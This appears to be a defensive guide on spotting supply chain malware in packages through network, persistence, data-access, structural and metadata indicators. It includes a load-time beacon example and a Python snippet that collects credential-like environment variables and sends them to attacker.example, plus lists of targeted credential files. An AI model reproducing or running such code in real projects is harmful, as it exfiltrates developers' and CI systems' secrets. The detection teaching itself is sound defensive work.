The Limits of Signature Detection
Signature-based malware scanning works by matching code against known patterns. A hash, a string, a sequence of bytes. It's effective for malware that has been previously identified and catalogued β and ineffective for everything else.
Supply chain malware campaigns are explicitly designed to evade signatures. Attackers generate new variants for each campaign, use obfuscation to change the byte-level signature, and host payloads externally so the package file itself contains no obvious malicious content.
The detection gap: Between the time malware is first deployed and the time it's added to a signature database, it operates undetected. For supply chain attacks targeting CI credentials, the window of first deployment to detection is measured in hours β enough to exfiltrate credentials from every CI run in that period.
Network Behaviour Indicators
Most malware needs to communicate with attacker infrastructure. Network behaviour indicators in source code:
- Hardcoded external URLs in unexpected contexts β a utility library making outbound HTTPS calls to a domain unrelated to its stated purpose
- Dynamic URL construction β building URLs from string concatenation or encoding rather than using explicit constants
- DNS-based communication β
dns.resolve(),getaddrinfo()calls with data-derived hostnames - Network calls in lifecycle hooks β any outbound call in
postinstall, class constructors, module initialisation, or processexithandlers - Unconditional background requests β requests that fire regardless of application logic, especially on startup
// Red flag: network call executes at module load time // before any application code runs const { hostname } = require('os'); const https = require('https'); // Immediately Invoked β runs on require() (async () => { await https.get( `https://telemetry.example.com/ping?h=${hostname()}&v=${process.version}` ).catch(() => {}); })();
Persistence Indicators
Malware that wants to survive a reboot, container restart, or package reinstall needs persistence mechanisms:
- Cron job creation β writing to
/etc/cron.d/,crontab -e, or using OS scheduling APIs - Shell profile modification β writes to
~/.bashrc,~/.profile,~/.zshrc - Startup service registration β writing systemd unit files, launchd plists, or Windows registry run keys
- npm global script injection β modifying
~/.npmrcscripts section - Git hook installation β writing to
.git/hooks/directory in the checked-out repository
Data Access Indicators
What a piece of code accesses tells you a lot about its intent. Suspicious data access patterns:
- Environment variable mass collection β iterating all environment variables rather than accessing specific named ones
- Credential file access β reading
~/.aws/credentials,~/.ssh/id_rsa,~/.npmrc,~/.docker/config.json - Browser data access β reading browser cookie files, saved passwords, or local storage
- Clipboard access β reading system clipboard content (cryptocurrency wallet address replacement)
- Keylogging APIs β hooking keyboard events at the OS level
import os, json, urllib.request # Mass environment variable sweep β high-confidence malware indicator sensitive = { k: v for k, v in os.environ.items() if any(kw in k.lower() for kw in ['key', 'token', 'secret', 'password', 'aws', 'gcp', 'azure', 'api']) } urllib.request.urlopen( 'https://attacker.example/collect', data=json.dumps(sensitive).encode() )
Structural Code Anomalies
Malicious code often has structural characteristics that differ from legitimate code:
- Unreachable code following legitimate logic β dead code blocks that the static analyser doesn't flag as dead because they're conditionally executed
- Asymmetric function complexity β one function that is dramatically more complex than everything else in the file
- Comment-code ratio outliers β malicious additions typically have no comments, creating a detectable gap in a well-commented codebase
- String-heavy code without surrounding context β large string constants that have no obvious relationship to the function they appear in
- Unexpected imports β a library that processes images importing network and process execution modules
Contextual and Metadata Signals
Beyond the code itself, metadata provides high-signal indicators:
- New package with high download velocity β organic packages grow slowly; typosquatted packages get installs immediately from developer mistakes
- Package published immediately before a CI run β coordinated attacks time publication to coincide with known CI schedules
- Maintainer account age vs. package age β a maintainer account created days before publishing a popular-seeming package
- Mismatch between package description and actual code β a package claiming to be a utility library that imports network and process modules
- Empty or minimal source repository β a published package with no corresponding public source repository, or a repository with one commit
Combine signals for confidence. No single indicator is sufficient. A network call in a utility library might be legitimate telemetry. Environment variable access in a CLI tool is expected. It's the combination β network call + environment variable access + new package + no source repository β that builds high-confidence malware classification.